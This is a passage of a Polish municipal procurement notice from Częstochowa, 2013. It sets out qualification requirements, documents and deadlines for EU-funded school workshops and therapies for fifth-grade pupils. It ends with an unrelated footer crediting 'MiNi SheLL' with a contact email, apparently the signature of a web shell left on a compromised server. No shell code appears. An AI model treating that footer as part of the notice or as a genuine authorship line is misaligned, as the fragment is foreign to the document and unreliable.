w przerwach między poszczególnymi zajęciami wynikającymi z planu zajęć oraz przed lub po odbyciu wszystkich zajęć lekcyjnych w danym dniu. Zamawiający zastrzega sobie możliwość zmiany powyższych terminów po konsultacjach z Wykonawcą. Harmonogram realizacji przedmiotu zamówienia będzie na bieżąco konsultowany z Zamawiającym i dostosowany do możliwości lokalowych i czasowych szkół biorących udział w projekcie oraz uczestników projektu.
3. Zajęcia będą prowadzone w zależności od wyniku procesu rekrutacji i bieżącej realizacji zajęć z ewentualnym podziałem na grupy i z częstotliwością realizacji zajęć wskazanymi przez Zamawiającego.
4. Podane liczby godzin na poszczególne części są orientacyjne i w toku realizacji umowy liczba godzin może ulec zmianie.
5. Jedną godzinę zajęć należy traktować jako godzinę lekcyjną, tj. 45 minut (60 minut w przypadku zajęć specjalistycznych w Szkołach Specjalnych).
6. Za realizację zamówienia Wykonawcy będzie przysługiwać wynagrodzenie stanowiące iloczyn liczby godzin realizacji usługi oraz oferowanej ceny jednostkowej za 1 godzinę za wykonywanie usługi..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 87.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą ubiegać się wykonawcy, którzy w zakresie poszczególnych części dysponują osobami, które będą uczestniczyć w wykonywaniu zamówienia, spełniającymi poniższe kryteria:

W zakresie części: 1, 3, 7, 12, 19, 22, 26, 30, 35, 40, 45, 48, 51, 56, 61, 66,  75, 76, 79, 83:  Prowadzenie warsztatu matematyczo-przyrodniczego z elementami informatyki dla uczniów klas V:
-wykształcenie wyższe o kierunkach matematycznych i/lub przyrodniczych i/lub informatycznych, z przygotowaniem pedagogicznym; 
-przynajmniej 2-letnie doświadczenie w pracy z dziećmi do 13. roku życia;
-przynajmniej 2-letnie doświadczenie w prowadzeniu zajęć matematycznych i/lub przyrodniczych i/lub informatycznych. 	

W zakresie części: 2, 11, 16, 25, 34, 39, 47, 50, 55, 60, 65, 70, 74,78 : Prowadzenie warsztatu artystyczno-teatralno-filmowego w SP nr 1  dla uczniów klas V:
-wykształcenie wyższe z przygotowaniem pedagogicznym lub udokumentowana praca związana z teatrem i/lub filmem; 
-przynajmniej 2-letnie doświadczenie w pracy z dziećmi do 13. roku życia;
-przynajmniej 2-letnie doświadczenie  w prowadzeniu zajęć o tematyce teatralno-filmowej i/lub doświadczenie w pracy przy filmie i/lub doświadczenie w pracy przy  sztuce teatralnej.

W zakresie części: 4, 8, 13, 17, 27, 31, 36, 41, 49, 52, 57, 62, 67, 71, 84: Prowadzenie warsztatu humanistycznego z akcentem na regionalizm  dla uczniów klas V:
-wykształcenie wyższe o kierunku polonistyka i/lub historia, z przygotowaniem pedagogicznym; 
-przynajmniej 2-letnie doświadczenie w pracy z dziećmi do 13. roku życia;
-przynajmniej 2-letnie doświadczenie w prowadzeniu zajęć humanistycznych.

W zakresie części: 5, 9, 14, 20, 23, 28, 32, 37, 42, 46, 53, 58, 63, 68, 72: Prowadzenie warsztatu artystyczno-muzycznego  dla uczniów klas V:
-wykształcenie wyższe o kierunkach muzyka i/lub sztuka, z przygotowaniem pedagogicznym; 
-przynajmniej 2-letnie doświadczenie w pracy z dziećmi do 13. roku życia;
-przynajmniej 2-letnie doświadczenie w prowadzeniu zajęć muzycznych i/lub doświadczenie w pracy związanej z tematyką muzyczną.

W zakresie części: 6, 10, 15, 18, 21, 24, 29, 33, 38, 43, 54, 59, 64, 69, 73, 77 Prowadzenie warsztatu artystyczno-plastycznego dla uczniów klas V:
wykształcenie wyższe o kierunkach plastyka i/lub sztuka, z przygotowaniem pedagogicznym; 
-przynajmniej 2-letnie doświadczenie w pracy z dziećmi do 13. roku życia;
-przynajmniej 2-letnie doświadczenie w prowadzeniu zajęć plastycznych i/lub doświadczenie w pracy związanej z tematyką plastyczną.

W zakresie części 80: Prowadzenie terapii integracji sensorycznej w Specjalnym Ośrodku Szkolno-Wychowawczym nr 1 dla uczniów klas V
-kwalifikacje zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudniać nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z 2009 r., Nr 50, poz. 400 z późn. zmianami) 	uprawniające do pracy z dziećmi z niepełnosprawnością intelektualną;
-kwalifikacje do prowadzenia integracji sensorycznej 
-przynajmniej 2-letnie doświadczenie w prowadzeniu zajęć integracji sensorycznej z dziećmi z niepełnosprawnością intelektualną.

W zakresie części 81: Prowadzenie kinezjologii edukacyjnej w Specjalnym Ośrodku Szkolno-wychowawczym nr 1 dla uczniów klas V
-kwalifikacje zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudniać nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z 2009 r., Nr 50, poz. 400 z późn. zmianami) uprawniające do pracy z dziećmi z niepełnosprawnością intelektualną;
-kwalifikacje do prowadzenia kinezjologii edukacyjnej; 
-minimum 2-letnie doświadczenie w prowadzeniu zajęć kinezjologii edukacyjnej 
z dziećmi z niepełnosprawnością intelektualną.

W zakresie części 82: Prowadzenie poradnictwa psychologiczno-pedagogicznego
 w Specjalnym Ośrodku Szkolno-wychowawczym nr 1 dla uczniów klas V
wykształcenie wyższe psychologiczne;
-kwalifikacje zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudniać nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z 2009 r., Nr 50, poz. 400 z późn. zmianami)uprawniające do pracy z dziećmi z niepełnosprawnością intelektualną;
-kwalifikacje do prowadzenia poradnictwa psychologiczno-pedagogicznego;
-minimum 2-letnie doświadczenie w prowadzeniu poradnictwa psychologiczno-pedagogicznego u dziećmi z niepełnosprawnością intelektualną.

W zakresie części 85: Prowadzenie terapii integracji sensorycznej w  Zespole Szkół Specjalnych nr 28 dla uczniów klas V:
-wykształcenie wyższe i oligofrenopedagogika
-kursy integracji sensorycznej
-przynajmniej 2-letnie doświadczenie w pracy z dziećmi do 13. roku życia;
-przynajmniej 2-letnie doświadczenie w prowadzeniu terapii integracji sensorycznej z dziećmi z niepełnosprawnością intelektualną.

W zakresie części 86: Prowadzenie terapii metodą Tomatisa w  Zespole Szkół Specjalnych nr 28 dla uczniów klas V:
-wykształcenie wyższe i oligofrenopedagogika
-kursy pracy z dziećmi metodą Tomatisa
-przynajmniej 2-letnie doświadczenie w pracy z dziećmi do 13. roku życia;
-przynajmniej 2-letnie doświadczenie w prowadzeniu terapii metodą Tomatisa z dziećmi z niepełnosprawnością intelektualną.

W zakresie części 87: Prowadzenie alternatywnych metod komunikacji w  Zespole Szkół Specjalnych nr 28 dla uczniów klas V:
-wykształcenie wyższe i oligofrenopedagogika i surdopedagogika
-kursy z zakresu alternatywnych metod komunikacji
-kurs z zakresu terapii patologii zachowań
-przynajmniej 2-letnie doświadczenie w pracy z dziećmi do 13. roku życia;
-przynajmniej 2-letnie doświadczenie w prowadzeniu alternatywnych metod komunikacji z dziećmi z niepełnosprawnością intelektualną.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wymagania dotyczące dokumentów, określonych w punkcie 6.1. siwz
1.1. Dokumenty, o których mowa w punkcie 6.1 muszą być złożone w oryginale.
1.2. Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski.
1.3. W przypadku składania oferty wspólnej przez kilku przedsiębiorców (tzw. konsorcjum) lub przez spółkę cywilną, każdy ze wspólników konsorcjum lub spółki cywilnej musi złożyć oświadczenie wymienione w punkcie 6.1.a) wraz z dokumentem wymienionym w punkcie 6.1.b) siwz. Pozostałe dokumenty będą traktowane jako wspólne. Wspólnicy muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. Do oferty należy dołączyć stosowne pełnomocnictwo, podpisane przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników. Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu cywilnego. 
1.4. Zgodnie z art. 26 ust. 2b Prawa zamówień publicznych wykonawca może polegać na wiedzy i doświadczeniu oraz osobach dolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, tj. przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. W/w zobowiązanie musi być przedstawione w oryginale.
1.5 W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku, gdy wykonawca wykazując spełnianie warunków, o których mowa w punktach 5.2. SIWZ polega na zasobach innych podmiotów, kopie dokumentów potwierdzających spełnianie tych warunków, dotyczących odpowiednio wspólników konsorcjum lub innych podmiotów powinny być poświadczone za zgodność z oryginałem przez wspólników konsorcjum (każdy w odniesieniu do dokumentów go dotyczących) lub przez pełnomocnika konsorcjum, jeżeli będzie miał do tej czynności upoważnienie, a w odniesieniu do innych podmiotów przez upoważnionych przedstawicieli tych podmiotów (każdy w odniesieniu do dotyczących go dokumentów).
2. Inne dokumenty wymagane przez zamawiającego:
a) Wypełniony druk OFERTA stanowiący załącznik nr 1 do siwz, zawierający oświadczenie, że wykonawca spełnia wszystkie warunki określone w specyfikacji istotnych warunków zamówienia oraz w art. 22 ust. 1 ustawy Prawo zamówień publicznych.
Upoważnienie osób podpisujących ofertę do jej podpisania musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny wykonawcy, to do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kserokopii potwierdzonej notarialnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zleceniodawca dopuszcza możliwość przesunięcia terminu realizacji zamówienia, jeśli wystąpią obiektywne okoliczności niezależne od zleceniobiorcy uniemożliwiające wykonanie usługi i jednocześnie wydłużenia okresu realizacji usługi o czas trwania tych okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.czestochowa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> e-mail: ebonarska@czestochowa.um.gov.pl,oraz Urząd Miasta Częstochowy Wydział Inwestycji i Zamówień Publicznych, ul. Śląska 11/13, 42-217 Częstochowa..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.04.2013 godzina 08:30, miejsce: Biuro Obsługi Interesanta (parter), stanowisko Wydziału Nadzoru i Administracji, ul. Śląska 11/13, 42-217 Częstochowa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytetu IX - Rozwój kompetencji i wykształcenia w regionach, Działania 9.1. - Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałania 9.1.2. - Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych Programu Operacyjnego Kapitał Ludzki 2007-2013.
Specyfikacja istotnych warunków zamówienia będzie dostępna na stronie internetowej Zamawiającego: http://bip.czestochowa.pl Na tej stronie Zamawiający będzie również zamieszczał pytania i odpowiedzi, modyfikacje SIWZ, odwołania dot. treści ogłoszenia oraz postanowień specyfikacji istotnych warunków zamówienia, ogłoszenie o wyborze najkorzystniejszej oferty..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com